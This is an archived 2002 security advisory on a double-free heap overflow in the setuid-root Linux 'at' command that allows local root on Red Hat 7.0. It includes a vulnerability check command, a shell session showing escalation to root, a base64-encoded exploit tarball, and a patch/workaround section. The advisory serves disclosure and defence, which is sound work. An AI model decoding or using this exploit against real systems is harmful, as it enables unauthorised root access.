Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: lnx5007.htm

at heap overflow may lead to root access



17th Jan 2002 [SBWID-5007]
COMMAND

	at heap overflow may lead to root access

SYSTEMS AFFECTED

	at before 3.1.8

PROBLEM

	Zen-parse reported :
	

	The \'at\' command reads commands from standard input for  execution  at
	a later time specified on the command line. If such  an  execution  time
	is given in a carefully drafted (but wrong) format, the at  command  may
	crash as a result of a surplus call to free(). The cause  of  the  crash
	is a heap corruption that is  exploitable  under  certain  circumstances
	since the /usr/bin/at command is installed setuid root.
	

	To check if you are potentially vulnerable  to  this  exploit,  execute:
	/usr/bin/at 31337 +  vuln.  If  you  are  vulnerable  this  will  cause:
	\"Segmentation fault\"; If not, there will  be  a  message  similar  to:
	\"Garbled time\" (possibly with some extra information). The problem  is
	caused by a  bug  in  the  parser  which  deallocates  the  same  memory
	location twice.  This  can  sometimes  be  exploited,  for  the  uid  of
	\"daemon\", and due to some other minor problems, may allow root  access
	from there.
	

	Attached is an exploit for Redhat 7.0.
	

	bash-2.04$ rpm -qf /lib/libc-*

	glibc-2.2.4-18.7.0.3 

	bash-2.04$ rpm -qf /usr/bin/at

	at-3.1.8-12

	bash-2.04$ tar -xzf attn.tar.gz

	bash-2.04$ cd attn

	bash-2.04$ id

	uid=500(evil) gid=500(evil) groups=500(evil)

	bash-2.04$ ./doit.sh

	woot-2.04# id

	uid=0(root) gid=0(root) groups=500(evil)

	woot-2.04# echo \"I was just testing something and you need to fix at or some malicious hacker could be evil.\" |mail -s \"Fix /usr/bin/at\" root

	woot-2.04# exit

	bash-2.04$ 

	

	

	-------------------------------------------------------------------------
	1) If this message was posted to a public  forum  by  zen-parse@gmx.net,
	it may be redistributed without modification. 2) In any other  case  the
	contents of this message is confidential and not to  be  distributed  in
	any form without express permission from the author. This  document  may
	contain Unclassified Controlled Nuclear Information.
	

	---1463783680-1867212452-1011226355=:13482

	Content-Type: APPLICATION/X-GZIP; NAME=\"attn.tar.gz\"

	Content-Transfer-Encoding: BASE64

	Content-ID: <Pine.LNX.4.33.0201171312350.13482@clarity.local>

	Content-Description: Local root exploit (rh 7.0)

	Content-Disposition: ATTACHMENT; FILENAME=\"attn.tar.gz\"

	

	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

	vABQAAA=

	---1463783680-1867212452-1011226355=:13482--

	

SOLUTION

	A temporary workaround against the bug is to disable the at command  for
	non-root users by removing the setuid-bit from the /usr/bin/at command.
	

	Patches are available from the various integrators.
	

	 http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.dsc

	 http://security.debian.org/dists/stable/updates/main/source/at_3.1.8-10.2.diff.gz

	 http://security.debian.org/dists/stable/updates/main/source/at_3.1.8.orig.tar.gz

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH